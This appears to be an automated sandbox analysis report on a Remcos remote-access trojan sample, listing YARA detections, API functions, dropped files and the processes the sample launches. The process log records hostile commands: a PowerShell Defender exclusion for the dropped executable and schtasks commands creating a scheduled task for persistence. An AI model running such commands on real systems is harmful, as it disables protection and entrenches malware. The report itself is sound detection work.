              Source: Yara matchFile source: 0.2.vQyKfYxzXB.exe.44a1440.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.vQyKfYxzXB.exe.43e7e20.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1316899514.00000000042E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1364291273.0000000001167000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.3751309222.0000000001757000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1316899514.0000000004322000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vQyKfYxzXB.exe PID: 7548, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: vQyKfYxzXB.exe PID: 7932, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RTdozXra.exe PID: 2140, type: MEMORYSTR

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Contains functionalty to change the wallpaper
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_0041A76C SystemParametersInfoW,15_2_0041A76C

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 0.2.vQyKfYxzXB.exe.43e7e20.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0.2.vQyKfYxzXB.exe.43e7e20.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0.2.vQyKfYxzXB.exe.43e7e20.3.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 0.2.vQyKfYxzXB.exe.455aa60.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0.2.vQyKfYxzXB.exe.455aa60.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0.2.vQyKfYxzXB.exe.455aa60.2.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 15.2.RTdozXra.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 15.2.RTdozXra.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 15.2.RTdozXra.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 15.2.RTdozXra.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 15.2.RTdozXra.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 15.2.RTdozXra.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 0.2.vQyKfYxzXB.exe.455aa60.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0.2.vQyKfYxzXB.exe.455aa60.2.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 0.2.vQyKfYxzXB.exe.44a1440.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0.2.vQyKfYxzXB.exe.44a1440.1.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 0.2.vQyKfYxzXB.exe.43e7e20.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0.2.vQyKfYxzXB.exe.43e7e20.3.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 00000000.00000002.1316899514.00000000042E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 00000000.00000002.1316899514.0000000004322000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: vQyKfYxzXB.exe PID: 7548, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: RTdozXra.exe PID: 2140, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_00414DB4 ExitWindowsEx,LoadLibraryA,GetProcAddress,15_2_00414DB4
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeCode function: 0_2_03133E280_2_03133E28
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeCode function: 0_2_0313E22C0_2_0313E22C
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeCode function: 0_2_031370190_2_03137019
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeCode function: 0_2_076DDF290_2_076DDF29
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeCode function: 0_2_076D6B600_2_076D6B60
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeCode function: 0_2_076F46900_2_076F4690
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeCode function: 0_2_076F29480_2_076F2948
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeCode function: 0_2_076F8C780_2_076F8C78
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeCode function: 0_2_076F50580_2_076F5058
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeCode function: 0_2_076F58C00_2_076F58C0
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeCode function: 0_2_076F15780_2_076F1578
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeCode function: 0_2_08D40E780_2_08D40E78
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeCode function: 0_2_08D407100_2_08D40710
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeCode function: 0_2_08D41AD80_2_08D41AD8
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeCode function: 0_2_08D45E480_2_08D45E48
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeCode function: 0_2_08D484100_2_08D48410
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeCode function: 0_2_08EE11B00_2_08EE11B0
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeCode function: 0_2_08EECBF00_2_08EECBF0
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeCode function: 0_2_08EEBE080_2_08EEBE08
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeCode function: 0_2_08EEC2400_2_08EEC240
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeCode function: 0_2_08EE03B00_2_08EE03B0
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeCode function: 0_2_08EEA3280_2_08EEA328
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeCode function: 0_2_08EEA7600_2_08EEA760
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 11_2_01443E2811_2_01443E28
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 11_2_0144E22C11_2_0144E22C
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 11_2_0144701911_2_01447019
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 11_2_072F071011_2_072F0710
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 11_2_072F0E7811_2_072F0E78
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 11_2_072F841011_2_072F8410
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 11_2_072F5E4811_2_072F5E48
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 11_2_0749A76011_2_0749A760
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 11_2_0749A32811_2_0749A328
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 11_2_0749C24011_2_0749C240
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 11_2_0749BE0811_2_0749BE08
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 11_2_0749CBF011_2_0749CBF0
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 11_2_075A1BB811_2_075A1BB8
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_0042515215_2_00425152
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_0043528615_2_00435286
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_004513D415_2_004513D4
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_0045050B15_2_0045050B
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_0043651015_2_00436510
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_004316FB15_2_004316FB
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_0043569E15_2_0043569E
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_0044370015_2_00443700
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_004257FB15_2_004257FB
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_004128E315_2_004128E3
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_0042596415_2_00425964
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_0041B91715_2_0041B917
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_0043D9CC15_2_0043D9CC
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_00435AD315_2_00435AD3
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_00424BC315_2_00424BC3
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_0043DBFB15_2_0043DBFB
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_0044ABA915_2_0044ABA9
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_00433C0B15_2_00433C0B
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_00434D8A15_2_00434D8A
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_0043DE2A15_2_0043DE2A
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_0041CEAF15_2_0041CEAF
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_00435F0815_2_00435F08
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: String function: 00402073 appears 51 times
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: String function: 00432B90 appears 53 times
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: String function: 00432525 appears 41 times
              Source: vQyKfYxzXB.exe, 00000000.00000002.1316899514.0000000004322000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs vQyKfYxzXB.exe
              Source: vQyKfYxzXB.exe, 00000000.00000002.1325611011.000000000767C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameZfva.exeZ vs vQyKfYxzXB.exe
              Source: vQyKfYxzXB.exe, 00000000.00000002.1331795189.0000000009390000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs vQyKfYxzXB.exe
              Source: vQyKfYxzXB.exe, 00000000.00000000.1282711365.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameZfva.exeZ vs vQyKfYxzXB.exe
              Source: vQyKfYxzXB.exe, 00000000.00000002.1314848353.00000000033C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs vQyKfYxzXB.exe
              Source: vQyKfYxzXB.exe, 00000000.00000002.1326948045.0000000008EA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs vQyKfYxzXB.exe
              Source: vQyKfYxzXB.exe, 00000000.00000002.1313359631.000000000162E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs vQyKfYxzXB.exe
              Source: vQyKfYxzXB.exeBinary or memory string: OriginalFilenameZfva.exeZ vs vQyKfYxzXB.exe
              Source: vQyKfYxzXB.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 0.2.vQyKfYxzXB.exe.43e7e20.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.vQyKfYxzXB.exe.43e7e20.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0.2.vQyKfYxzXB.exe.43e7e20.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 0.2.vQyKfYxzXB.exe.455aa60.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.vQyKfYxzXB.exe.455aa60.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0.2.vQyKfYxzXB.exe.455aa60.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 15.2.RTdozXra.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 15.2.RTdozXra.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 15.2.RTdozXra.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 15.2.RTdozXra.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 15.2.RTdozXra.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 15.2.RTdozXra.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 0.2.vQyKfYxzXB.exe.455aa60.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.vQyKfYxzXB.exe.455aa60.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 0.2.vQyKfYxzXB.exe.44a1440.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.vQyKfYxzXB.exe.44a1440.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 0.2.vQyKfYxzXB.exe.43e7e20.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.vQyKfYxzXB.exe.43e7e20.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 00000000.00000002.1316899514.00000000042E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 00000000.00000002.1316899514.0000000004322000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: vQyKfYxzXB.exe PID: 7548, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: RTdozXra.exe PID: 2140, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: vQyKfYxzXB.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: RTdozXra.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@20/11@2/1
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_00415C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,15_2_00415C90
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_0040E2E7 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,15_2_0040E2E7
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_00419493 FindResourceA,LoadResource,LockResource,SizeofResource,15_2_00419493
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,15_2_00418A00
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeFile created: C:\Users\user\AppData\Roaming\RTdozXra.exeJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6684:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7828:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_03
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeMutant created: \Sessions\1\BaseNamedObjects\46875-RPQWNM
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeFile created: C:\Users\user\AppData\Local\Temp\tmp8902.tmpJump to behavior
              Source: vQyKfYxzXB.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: vQyKfYxzXB.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: vQyKfYxzXB.exeReversingLabs: Detection: 71%
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeFile read: C:\Users\user\Desktop\vQyKfYxzXB.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\vQyKfYxzXB.exe "C:\Users\user\Desktop\vQyKfYxzXB.exe"
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTdozXra.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTdozXra" /XML "C:\Users\user\AppData\Local\Temp\tmp8902.tmp"
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess created: C:\Users\user\Desktop\vQyKfYxzXB.exe "C:\Users\user\Desktop\vQyKfYxzXB.exe"
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess created: C:\Users\user\Desktop\vQyKfYxzXB.exe "C:\Users\user\Desktop\vQyKfYxzXB.exe"
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeProcess created: C:\Users\user\Desktop\vQyKfYxzXB.exe "C:\Users\user\Desktop\vQyKfYxzXB.exe"
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\RTdozXra.exe C:\Users\user\AppData\Roaming\RTdozXra.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTdozXra" /XML "C:\Users\user\AppData\Local\Temp\tmp9C1D.tmp"
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
